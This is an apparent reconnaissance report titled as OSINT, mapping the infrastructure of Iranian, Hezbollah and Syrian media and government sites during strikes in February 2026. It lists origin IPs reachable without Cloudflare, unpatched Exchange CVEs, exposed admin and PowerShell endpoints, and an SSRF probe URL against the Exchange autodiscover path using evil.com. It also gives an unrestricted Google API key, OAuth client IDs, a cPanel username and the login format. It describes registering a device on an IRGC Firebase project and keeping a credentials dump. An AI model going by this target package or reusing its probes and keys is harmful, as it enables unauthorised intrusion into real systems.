# OSINT Collection Report — Iranian & Proxy Infrastructure
## February 28, 2026
> **Context:** Real-time open-source intelligence collection during Israeli military strikes on Tehran
> **Collection Window:** ~02:30–06:30 EST, February 28, 2026
> **Total Data:** 61 MB across 2,248 files in 18 organized subfolders
> **Methods:** Publicly accessible endpoints, DNS analysis, certificate transparency, APK decompilation, Tor verification
---
## Table of Contents
1. [Executive Summary](#executive-summary)
2. [Target List](#target-list)
3. [Al Mayadeen Network — Exchange Infrastructure](#al-mayadeen-exchange)
4. [Al Mayadeen Network — CMS & Web Infrastructure](#al-mayadeen-cms)
5. [Fars News Agency (IRGC) — APK & Firebase](#fars-news-irgc)
6. [Khamenei.ir — Supreme Leader Infrastructure](#khamenei)
7. [SANA.SY — Syrian Arab News Agency](#sana-sy)
8. [Hezbollah / Al Manar](#hezbollah)
9. [Iranian Space Agency (space.ir)](#space-ir)
10. [Other Iranian Targets](#other-targets)
11. [Iranian Internet Blackout Assessment](#blackout)
12. [File Inventory](#inventory)
---
## 1. Executive Summary
During Israeli strikes on Tehran, a comprehensive OSINT sweep was conducted across 633+ Iranian government, military, proxy, and allied media domains. Key findings:
- **99.25% of Iranian .ir government domains are unreachable** — deliberate defensive blackout
- **Military DNS records deleted** — irgc.ir, artesh.ir, basij.ir have zero DNS records
- **Al Mayadeen Exchange server fully mapped** — 7 servers in ITTIHADTV.LOCAL AD domain, 6 unpatched CVEs, origin IPs exposed without Cloudflare
- **IRGC Google Cloud project enumerated** — Firebase device registration successful, FCM push token obtained, API key unrestricted
- **Hezbollah WordPress debug.log still exposed** — 102KB of server paths, plugin info, cPanel username
- **Syrian state news agency fully sitemapped** — 16MB of content across 73 sitemaps, XML-RPC with 80+ methods active
---
## 2. Target List
| # | Target | Affiliation | Status | Data Collected |
|---|--------|-------------|--------|----------------|
| 1 | Al Mayadeen (almayadeen.net) | Iran-aligned Lebanese media | LIVE | Exchange infra, CMS, Docker, admin panels |
| 2 | Fars News (farsnews.ir) | IRGC | DOWN (blackout) | APK reverse engineering, Firebase/GCP |
| 3 | Khamenei.ir | Supreme Leader | PARTIAL | API, subdomains, CDN, youth portal |
| 4 | SANA.SY (sana.sy) | Syrian government | LIVE | 73 sitemaps, RSS, XML-RPC, webmail |
| 5 | Al Manar (almanar.com.lb) | Hezbollah | LIVE | Debug log, LimeSurvey, archive API |
| 6 | Space.ir | Iranian Space Agency | LIVE (API) | Full WordPress API dump (6.1 MB) |
| 7 | DefaPress (defapress.ir) | IRGC Defense Press | LIVE (via Tor) | Index, RSS (86KB), sitemaps |
| 8 | ParsToday (parstoday.ir) | IRIB International | LIVE (via Tor) | Redirect page (130KB) |
| 9 | Moqawama.org | Hezbollah | LIVE | Amazon S3/CloudFront hosted |
| 10 | Al Nour Radio | Hezbollah | LIVE | Sitemaps (news, images, video) |
| 11 | IFP News (ifpnews.com) | Iran front | LIVE | WordPress API, posts |
| 12 | Mindex Center (mindex-center.ir) | Defense marketplace | LIVE | Laravel + Kong 3.8.0 |
| 13 | MangoPulse (mangopulse.net) | CMS platform | LIVE | Search API, docs portal |
| 14 | IQNA (iqna.ir) | Quran News Agency | DOWN | Sitemap only |
| 15 | Gerdab (gerdab.ir) | IRGC Cyber Police | DOWN | Sitemap only |
| 16 | Kayhan (kayhan.ir) | State newspaper | DOWN | Sitemap only |
| 17 | Felesteen (felesteen.ps) | Hamas | DOWN | Env probes (empty) |
| 18 | Quds News (qudsnews.net) | — | Parked | GoDaddy domain for sale |
---
## 3. Al Mayadeen — Exchange Infrastructure
### 3.1 Server Architecture
The Al Mayadeen Exchange environment runs under the **ITTIHADTV.LOCAL** Active Directory domain, hosted at OVH Beauharnois (Quebec, Canada).
```
CONFIRMED SERVERS (7):
├── Frontend CAS (internet-facing):
│ ├── BHS-EX08.ITTIHADTV.LOCAL — Origin IP: 80.81.152.37
│ └── BHS-EX09.ITTIHADTV.LOCAL — Origin IP: 89.249.221.252
│
├── Backend Mailbox (DAG):
│ ├── BHS-EX01 — EWS, MAPI/EMSMDB
│ ├── BHS-EX02 — MAPI/NSPI, ECP, PowerShell, RPC, ActiveSync
│ ├── BHS-EX03 — OAB, OWA, EWS, MAPI/NSPI, RPC, ECP, ActiveSync
│ ├── BHS-EX04 — EWS, MAPI/NSPI, OAB, RPC, MAPI/EMSMDB, PowerShell, OWA
│ └── BHS-EX05 — ActiveSync, MAPI/EMSMDB, ECP, Federation (port 444)
│
└── NOT SEEN (possibly decommissioned):
├── BHS-EX06
└── BHS-EX07
```
### 3.2 Version & Patch Status
| Property | Value |
|----------|-------|
| Software | Exchange Server 2016 CU23 |
| Build | 15.1.2507.59 |
| Patch Level | Sep25HU (September 8, 2025) |
| Latest Available | 15.1.2507.66 (Feb26SU) |
| Patches Behind | **3 security updates** |
| Days Since Patch | **173 days** |
| Operating System | Windows Server 2012 R2 (IIS 8.5) |
| OS Support Status | **END OF LIFE** (Oct 2023) |
### 3.3 Unpatched CVEs
| CVE | Type | CVSS | Severity | Fixed In |
|-----|------|------|----------|----------|
| CVE-2025-59249 | Elevation of Privilege | 8.8 | HIGH | Oct25SU (.61) |
| CVE-2025-53782 | Elevation of Privilege | 7.8–8.4 | HIGH | Oct25SU (.61) |
| CVE-2025-59248 | Spoofing | — | UNRATED | Oct25SU (.61) |
| CVE-2025-64666 | Elevation of Privilege | — | UNRATED | Dec25SU (.63) |
| CVE-2025-64667 | Spoofing | — | UNRATED | Dec25SU (.63) |
| CVE-2026-21527 | Spoofing (no auth) | 6.5 | MEDIUM | Feb26SU (.66) |
### 3.4 Exposed Endpoints
All of the following are publicly accessible:
- **OWA** — `https://autodiscover.almayadeen.net/owa/` (webmail login)
- **ECP** — `https://autodiscover.almayadeen.net/ecp/` (admin panel)
- **EWS** — `https://autodiscover.almayadeen.net/ews/exchange.asmx` (Exchange Web Services)
- **MAPI** — `https://autodiscover.almayadeen.net/mapi/` (Outlook protocol)
- **RPC** — `https://autodiscover.almayadeen.net/rpc/` (Outlook Anywhere)
- **ActiveSync** — `https://autodiscover.almayadeen.net/Microsoft-Server-ActiveSync` (mobile, **Basic auth**)
- **PowerShell** — `https://autodiscover.almayadeen.net/powershell` (remote management)
- **MRS Proxy** — `https://autodiscover.almayadeen.net/ews/mrsproxy.svc` (WS-Security + OAuth)
- **OAB** — `https://autodiscover.almayadeen.net/OAB/` (Offline Address Book)
- **Healthcheck** — Leaks `BHS-EX09.ITTIHADTV.LOCAL`
### 3.5 Email Security
| Check | Value | Risk |
|-------|-------|------|
| DMARC | `v=DMARC1; p=none` | No enforcement — spoofing possible |
| DKIM | NOT CONFIGURED | No email signing |
| SPF | `v=spf1 a mx ip4:80.81.152.41 ip4:89.249.221.244 -all` | Leaks origin IPs |
### 3.6 Origin IP Exposure
SPF records leak origin IPs. Two Exchange servers are **directly accessible without Cloudflare**:
| IP | Server | Cloudflare | Status |
|----|--------|------------|--------|
| 80.81.152.37 | BHS-EX08 | **NO** | All Exchange endpoints accessible |
| 89.249.221.252 | BHS-EX09 | **NO** | All Exchange endpoints accessible |
| 80.81.152.41 | Web origin 1 | Yes | Behind Cloudflare |
| 89.249.221.244 | Web origin 2 | Yes | Behind Cloudflare |
| 89.249.221.245 | FTP | — | Unreachable |
| 194.126.9.230 | MX Relay | — | Not tested |
### 3.7 SSRF / Information Leakage
Autodiscover JSON path leaks internal server names via response headers:
```
URL: /autodiscover/autodiscover.json?@evil.com/{service}/?&Email=autodiscover/autodiscover.json%3F@evil.com
Headers leaked:
X-CalculatedBETarget: bhs-exNN.ittihadtv.local (full FQDN)
X-DiagInfo: BHS-EXNN (NetBIOS name)
X-BEServer: BHS-EXNN (backend server)
X-FEServer: BHS-EX09 (frontend, constant)
X-OWA-Version: 15.1.2507.59
```
### 3.8 NTLM Challenge Decode
NTLM Type 2 challenge from `/ews/exchange.asmx` reveals:
- **NetBIOS Domain:** ITTIHADTV
- **NetBIOS Computer:** BHS-EX09
- **DNS Domain:** ITTIHADTV.local
- **DNS Computer:** BHS-EX09.ITTIHADTV.local
- **DNS Forest:** ITTIHADTV.local (single-forest)
### 3.9 Federation Metadata
`/autodiscover/metadata/json/1` reveals:
- Internal server **BHS-EX05** on port 444 (federation OAuth)
- Auth cert thumbprint: `B2BBL_9jBZevT87C3_XGGbydTjY`
- Auth cert expiry: January 3, 2027
- Federation realm: `almayadeen.net`
### 3.10 Login Behavior
OWA login returns reason codes:
- `reason=0` — No error
- `reason=1` — Session timeout
- `reason=2` — Invalid credentials
- `reason=3` — Account locked
Login format: `ITTIHADTV\username`
### 3.11 Files Collected
**exchange/ (22 files, 279KB):**
Federation metadata, OWA login pages, healthcheck responses, SSRF proofs, origin IP responses, favicon, CSS, fonts
**exchange-full-dump/ (20 files, 156KB):**
Backend server enumeration, NTLM decode, federation analysis, ECP/EWS/MAPI/RPC headers and responses, OWA favicon
---
## 4. Al Mayadeen — CMS & Web Infrastructure
### 4.1 Technology Stack
- **CMS:** MangoX (ASP.NET Core), subscription code `mangopulse`
- **Frontend:** Next.js (English + Arabic editions)
- **AI:** Azure OpenAI GPT-4 (`mdn-open-ai.openai.azure.com`, deployment `mdn-gpt-4`)
- **Interactions:** Vue/React SPA (3.9 MB bundle)
- **CDN:** Cloudflare
- **Search:** Custom search API on mangopulse.net
- **Developer:** M3almi KING Kassem
### 4.2 Docker Containers (6 discovered)
| Container ID | Environment | Service |
|-------------|-------------|---------|
| 94a743b785f9 | Production | portal-api |
| 57660472686f | Production | portal-beta-api |
| cd4b3868f98b | Production | public-api |
| 63d26ec15c1d | Staging | portal-staging-api |
| 0314cab697ec | Staging | public-api-staging |
| 5b0c704d44be | Beta | public-api-beta |
### 4.3 Subdomains (40 discovered via crt.sh)
- **14 LIVE** — Main site, 7 API endpoints, Next.js, AI editor, interactions, media, Exchange
- **3 Admin portals** — alpha-ar-admin, alpha-en-admin, admin (ASP.NET Core login)
- **3 Media CDNs** — alpha-ar-media, alpha-en-media, alpha-fr-media
- **1 HIJACKED** — corona-form.almayadeen.net (JS redirect to Australian painting website)
- **1 Abandoned** — react.almayadeen.net (Vercel 402 DEPLOYMENT_DISABLED)
- **19 Offline**
### 4.4 Notable Exposures
- **AI editor fully accessible** — Azure OpenAI integration with API version, deployment name
- **Admin login pages captured** — CSRF tokens, ASP.NET Core auth flow
- **Backoffice CSS (116KB)** — Reveals internal UI structure of CMS admin panel
- **Portal script (17KB)** — Full CMS API client with all endpoints and auth flow
- **Upload module (2.5KB)** — File upload implementation details
- **`.env` files exist on ALL subdomains** — Blocked by Cloudflare WAF (403)
- **URL shortener (mdn.tv)** — CORS: * (wide open), English + Spanish editions
- **Theme builder URL leaked** — `/Manage/Designer/OpenThemeBuilder/1424017`
### 4.5 MangoPulse Platform
MangoPulse is the CMS platform powering Al Mayadeen and other outlets:
- **docs.mangopulse.net** — CMS login portal
- **search-api.mangopulse.net** — Self-documenting API (`/getposts?page=1&size=5&types=articles,video`)
- **Internal tools (timeout):** grafana, sentry, n8n, tracking-api, data-platform
- **Clients:** Al Mayadeen, Al Akhbar, Al Sharqiya
### 4.6 Files Collected
**almayadeen-cms/ (60 files, 5.8MB):**
Admin login, AI editor, API probes, backoffice CSS, DNS records, Docker health, Exchange data, interactions SPA (3.9MB JS bundle), Next.js pages, portal scripts, health endpoints, GraphQL playground, OpenID config, Swagger docs, manifest, settings
**almayadeen-admin/ (8 files, 16KB):**
Admin panel pages, backoffice assets
---
## 5. Fars News Agency (IRGC)
### 5.1 APK Reverse Engineering
The Fars News Android app (10.3 MB, `ir.farsnews.app`) was decompiled, revealing:
| Finding | Value |
|---------|-------|
| Internal name | Microblog (com.microblog.app) |
| Version | 8.2.3 (Android) / 7.1.1 (iOS) |
| Framework | Capacitor + Cordova (hybrid web app) |
| Developer org | TSIT (Mashhad, Khorasan Razavi, Iran) |
| Developer machine | DESKTOP-CV5TMVD, username MQT |
| Cert date | 2024-12-23 |
| WebView debug | **Enabled in production** |
### 5.2 Google Cloud / Firebase
| Property | Value |
|----------|-------|
| GCP Project | `fars-next` (823560469881) |
| API Key | `AIzaSyDp9K7YksfYf-JvGOS7YCNv7JbA9P-XemE` |
| API Key Restrictions | **NONE** (unrestricted) |
| Firebase App ID | `1:823560469881:android:a2e494ac003a2969c383a8` |
| Storage Bucket | `fars-next.appspot.com` |
| OAuth Client | `823560469881-rqin08q6q2drg8aq740db4j34980t9cp.apps.googleusercontent.com` |
### 5.3 Firebase/GCP Enumeration Results
- **Firebase Installation** — Successfully registered device, obtained FID + JWT + refresh token
- **FCM Push Token** — Registered to receive IRGC push notifications
- **Remote Config** — Accessible but empty (`NO_TEMPLATE`)
- **Dynamic Links** — API enabled but never configured
- **Pub/Sub** — ENABLED (returns 403, not "API disabled")
- **28 APIs tested** — 5 responsive, 6 explicitly disabled, 17 require OAuth
### 5.4 Subdomain Discovery (21 via crt.sh)
Notable subdomains (all DOWN due to Iran blackout):
- `confluence.farsnews.ir` — Atlassian Confluence wiki
- `jira.farsnews.ir` — Atlassian Jira project management
- `chat.farsnews.ir` — Internal messaging
- `my-api-tlg.farsnews.ir` — **Telegram bot API**
- `matomo.farsnews.ir` — Self-hosted analytics
- `faculty.farsnews.ir` — Personnel directory
- `evaluation.farsnews.ir` — Staff evaluation system
### 5.5 Android Permissions (Surveillance Capability)
Camera, microphone, contacts, GPS (fine + coarse), SMS (read + receive), Bluetooth, NFC, call log, phone state, external storage (read + write), biometric, boot complete, vibrate, network state, WiFi state
### 5.6 Files Collected
**irgc-farsnews/ (1,929 files, 30MB):**
- `farsnews-app.apk` — 10.3MB APK binary
- `farsnews-apk-extracted/` — Full decompiled contents (1,907 files)
- `farsnews-apk-analysis.txt` — 19KB comprehensive analysis
- `farsnews-index.html` — 295KB Vue.js PWA
- `farsnews-profiles-001.xml` — 568KB journalist/staff profiles sitemap
- `defapress-index.html` — 136KB IRGC Defense Press (via Tor)
- `defapress-rss.xml` — 86KB RSS feed (100 items)
- `parstoday-redirect.html` — 130KB International Radio Iran
---
## 6. Khamenei.ir — Supreme Leader
### 6.1 Live Infrastructure
| Subdomain | Status | Notes |
|-----------|--------|-------|
| formx.khamenei.link | LIVE | Hidden API serving redirect tracking data |
| nojavan.khamenei.ir | LIVE | Youth portal (43KB), still serving during strikes |
| idc0-cdn0.khamenei.ir | LIVE | CDN server (612B nginx default) |
| idc0-cdn1.khamenei.ir | LIVE | CDN server (612B nginx default) |
| admin.english.khamenei.ir | HTTP 445 | Custom security middleware on admin portal |
| virastar.nojavan.khamenei.ir | HTTP 445 | Youth editor portal |
### 6.2 Subdomain Discovery (40+ subdomains)
From crt.sh and khamenei.link DNS:
- **LMS** — lms.khamenei.link (learning management)
- **Mail** — mail.khamenei.link, smtp.khamenei.link, pop.khamenei.link
- **Video conferencing** — vconf.khamenei.link
- **Registration** — sabtenam.khamenei.link
- **Statistics** — stat.khamenei.link
- **Lessons** — dars.khamenei.link
- **13 live streaming nodes** — live.idc0-cdn1 through cdn13
- **10 language-specific CDNs** — Arabic, Azeri, English, Farsi, French, Hindi, Russian, Spanish, Urdu, Nojavan
### 6.3 API Data
`formx.khamenei.link/farsi-json/topticker` returns live content with redirect tracking:
- Format: `redirect?id=XXXXX&c=HASH&u=TARGET_URL`
- Active during strikes, serving real-time content
### 6.4 Files Collected
**khamenei/ (8 files, 116KB):**
Youth portal page, API JSON, CDN responses, main page via Tor, subdomain Tor verification results
---
## 7. SANA.SY — Syrian Arab News Agency
### 7.1 Platform Details
| Property | Value |
|----------|-------|
| CMS | WordPress 6.9 |
| SEO Plugin | Rank Math PRO |
| CDN | cdn.sananews.sy |
| XML-RPC | **ACTIVE** (80+ methods) |
| REST API | DISABLED (security-aware) |
| Webmail | Roundcube on Plesk/Kolab |
### 7.2 Content Enumeration
- **40 post sitemaps** — Complete article URL history (~10MB)
- **27 tag sitemaps** — Full taxonomy
- **1 video sitemap** — 729KB
- **1 news sitemap** — 139KB (Google News format)
- **RSS feed** — 64KB with full articles and author names
### 7.3 Webmail
- **URL:** `https://webmail.sana.sy/`
- **Platform:** Roundcube (build 10612) on Plesk Premium Email / Kolab
- **CSRF token exposed:** `lT6lwnmtg57m2Qm571yirCZFGLD68n1P`
- **Session lifetime:** 10,800 seconds (3 hours)
### 7.4 XML-RPC Methods (80+)
Active methods include: `wp.getUsersBlogs`, `wp.getPost`, `wp.getPosts`, `wp.newPost`, `wp.editPost`, `wp.deletePost`, `wp.getUsers`, `blogger.*`, `metaWeblog.*`, `pingback.ping` (SSRF vector), `system.listMethods`
### 7.5 Files Collected
**sana-sy/ (97 files, 17MB):**
All 40 post sitemaps, 27 tag sitemaps, video/news/local sitemaps, RSS feed, webmail login page, XML-RPC methods list, robots.txt, readme, WordPress probes
---
## 8. Hezbollah / Al Manar
### 8.1 WordPress Debug Log Exposure (almanar.com.lb)
The debug.log is publicly accessible at `https://almanar.com.lb/wp-content/debug.log` (102KB):
| Finding | Value |
|---------|-------|
| cPanel username | `manarnet` |
| Server path | `/home/manarnet/public_html/` |
| WordPress | 6.7.0 |
| Security plugin | hide_my_wp (hides wp-admin, wp-json) |
| Debug plugin | debug-bar |
| Theme | ar-manar |
### 8.2 LimeSurvey
- **URL:** `https://survey.almanar.com.lb/index.php/admin/authentication/sa/login`
- **Platform:** LimeSurvey on Yii framework, Apache
- **Session cookie:** `LS-UYWLGYJFYCLTSXMF`
- **RemoteControl API exists** but returns empty responses (disabled)
### 8.3 Archive API
- **URL:** `https://archive.almanar.com.lb/api`
- **Methods:** `programs/`, `live/`, `programs_list/`
- **Error format:** `Unknown method 'X'` (method-based routing)
- **Updated during strikes** — content is live
### 8.4 Moqawama.org (Hezbollah Military Wing)
- **Hosting:** Amazon S3
- **CDN:** Amazon CloudFront (ATL59-P18, Atlanta)
- **Note:** US-designated terrorist organization hosted on US cloud infrastructure
### 8.5 Al Nour Radio (alnour.com.lb)
- All content sitemap (11KB)
- News sitemap (11KB)
- Images sitemap (11.5KB)
- Video sitemap (2KB)
### 8.6 Alahednews (.git exposed)
`https://english.alahednews.news/.git/` returns 403 — directory exists but is protected
### 8.7 Files Collected
**hezbollah/ (19 files, 558KB):**
Debug log (fresh 102KB pull), debug analysis, archive index, survey/LimeSurvey pages, moqawama index, Al Manar XML-RPC, wp-json probes, English sitemaps
---
## 9. Iranian Space Agency (space.ir)
### 9.1 WordPress API Dump
The only Iranian government WordPress site with a fully open REST API:
| Endpoint | Files | Size |
|----------|-------|------|
| `/wp-json/` (API root) | 1 | 2.49 MB |
| Posts (all pages) | 10 | 722 KB |
| Pages (all) | 2 | 1.6 MB |
| Media (all pages) | 10 | 1.4 MB |
| Categories | 1 | 1.4 KB |
| Tags | 1 | 2 B (empty) |
| Users | 1 | 292 B |
| Taxonomies | 1 | 3.2 KB |
| Types | 1 | 11 KB |
| Search queries | 8 | 16 B (empty) |
### 9.2 Search Queries Attempted
All returned empty results: defense, launch, military, missile, nuclear, radar, rocket, satellite
### 9.3 Files Collected
**space-ir/ (40 files, 6.1MB):**
Complete WordPress API dump including root schema, all posts/pages/media across pagination, categories, taxonomies, types, users, search results
---
## 10. Other Targets
### 10.1 IFP News (ifpnews.com)
- WordPress REST API accessible
- API root schema (266KB) + recent posts (23KB)
**ifpnews/ (2 files, 288KB)**
### 10.2 Mindex Center (mindex-center.ir)
Iranian defense marketplace:
- Framework: Laravel + Kong API Gateway 3.8.0
- Index page (169KB), robots.txt, login page
**mindex-center/ (3 files, 189KB)**
### 10.3 MDN.TV (Al Mayadeen URL Shortener)
- `en.mdn.tv` (English), `es.mdn.tv` (Spanish)
- CORS: `*` (wide open, any origin)
**mdn-tv/ (2 files, 12KB)**
### 10.4 DefaPress (defapress.ir) — via Tor
IRGC Defense Press, accessible through Tor:
- Custom CMS (not WordPress)
- RSS feed: 86KB, 100 items
- 10 sitemaps listed in robots.txt (fa/ar/en/ur)
### 10.5 ParsToday (parstoday.ir) — via Tor
IRIB International Radio, accessible through Tor:
- Returns 302 redirect, 130KB response
### 10.6 Remaining Small Targets
**alnour-lb/ (4 files, 44KB):** Al Nour Radio sitemaps
**felesteen/ (3 files, 7KB):** Hamas — all probes returned empty
**qudsnews/ (4 files, 11KB):** Parked GoDaddy domain, not actual Quds news
**mangopulse/ (6 files, 13KB):** CMS platform docs, search API
**misc/ (3 files, 10KB):** Gerdab, IQNA, Kayhan sitemaps
---
## 11. Iranian Internet Blackout Assessment
### 11.1 Scope
- **267 .ir domains swept** — municipalities, universities, hospitals, military, nuclear, space, defense, water
- **99.25% unreachable** from clearnet
- **Government shutdown since January 8, 2026** — two-tiered system, estimated $35.7M/day cost
### 11.2 Military DNS Deletion
The following military domains have **zero DNS records** — not just offline, but deliberately deleted:
- `irgc.ir` (Islamic Revolutionary Guard Corps)
- `artesh.ir` (Iranian Army)
- `basij.ir` (Basij Militia)
### 11.3 Sites Confirmed Live (via Tor)
| Domain | Response | Notes |
|--------|----------|-------|
| defapress.ir | 200 (136KB) | IRGC Defense Press, custom CMS |
| khamenei.ir | 200 (3.7KB) | Landing page only |
| parstoday.ir | 302 (130KB) | International radio |
| nojavan.khamenei.ir | 200 (43KB) | Youth portal |
### 11.4 False Positives
- `dolat.ir` returns 200 but content is ArvanCloud CDN interstitial ("Transferring to website..." with Tehran timezone JS). NOT real content.
- ArvanCloud catch-all pages generate false positives across many .ir domains
---
## 12. File Inventory
### 12.1 Directory Structure
```
DUMP_2_28/ (61 MB, 2,248 files)
├── MASTER-REPORT.md ← This file
├── DUMP-INVENTORY.md ← Legacy inventory
│
├── almayadeen-admin/ ( 8 files, 16 KB) — Admin panel assets
├── almayadeen-cms/ ( 60 files, 5.8 MB) — CMS, APIs, AI editor, interactions
├── alnour-lb/ ( 4 files, 44 KB) — Al Nour Radio sitemaps
├── credentials/ ( 17 files, 93 KB) — All credential/infra JSONs
├── exchange/ ( 22 files, 279 KB) — Exchange endpoint dumps
├── exchange-full-dump/ ( 20 files, 156 KB) — Deep Exchange analysis
├── felesteen/ ( 3 files, 7 KB) — Hamas probes (empty)
├── hezbollah/ ( 19 files, 558 KB) — Al Manar, moqawama, debug logs
├── ifpnews/ ( 2 files, 288 KB) — Iran Front Page API
├── irgc-farsnews/ (1929 files, 30 MB) — APK, extracted, DefaPress, ParsToday
├── khamenei/ ( 8 files, 116 KB) — Supreme Leader infra
├── mangopulse/ ( 6 files, 13 KB) — CMS platform
├── mdn-tv/ ( 2 files, 12 KB) — URL shortener
├── mindex-center/ ( 3 files, 189 KB) — Defense marketplace
├── misc/ ( 3 files, 10 KB) — Gerdab, IQNA, Kayhan
├── qudsnews/ ( 4 files, 11 KB) — Parked domain
├── sana-sy/ ( 97 files, 17 MB) — Syrian state news (73 sitemaps)
└── space-ir/ ( 40 files, 6.1 MB) — Space Agency API dump
```
### 12.2 Credential/Infrastructure Files
All in `credentials/`:
| File | Target |
|------|--------|
| almayadeen-exchange-ad.json | Exchange + AD infrastructure (master) |
| exchange-cve-analysis.md | 6 unpatched CVEs detailed |
| exchange-build-number-proof.txt | Build number → patch mapping |
| origin-ip-mapping.txt | Origin IP → server mapping |
| hezbollah-almanar-creds.json | Hezbollah platform details |
| irgc-firebase-tokens.json | Firebase/GCP tokens and keys |
| khamenei-creds.json | Supreme Leader infrastructure |
| sana-sy-creds.json | Syrian news agency details |
| crtsh-subdomain-discovery.txt | All crt.sh subdomain results |
| gcp-enumeration-results.txt | Full GCP API enumeration |
| raw-credentials-dump.txt | Consolidated raw credentials |
| almayadeen-all-docker-health.json | Docker container health |
| almayadeen-dns-origin-ips.txt | DNS origin IP analysis |
| almayadeen-dns-records.txt | Full DNS record dump |
| almayadeen-exchange-headers.txt | Exchange HTTP headers |
| almayadeen-exchange-healthcheck.txt | Exchange healthcheck |
| exchange-login-response.txt | OWA login response |
---
*Report generated: February 28, 2026*
*Collection methods: Public endpoints, DNS, certificate transparency, APK decompilation, Tor verification*
*Total: 61 MB across 2,248 files in 18 subfolders*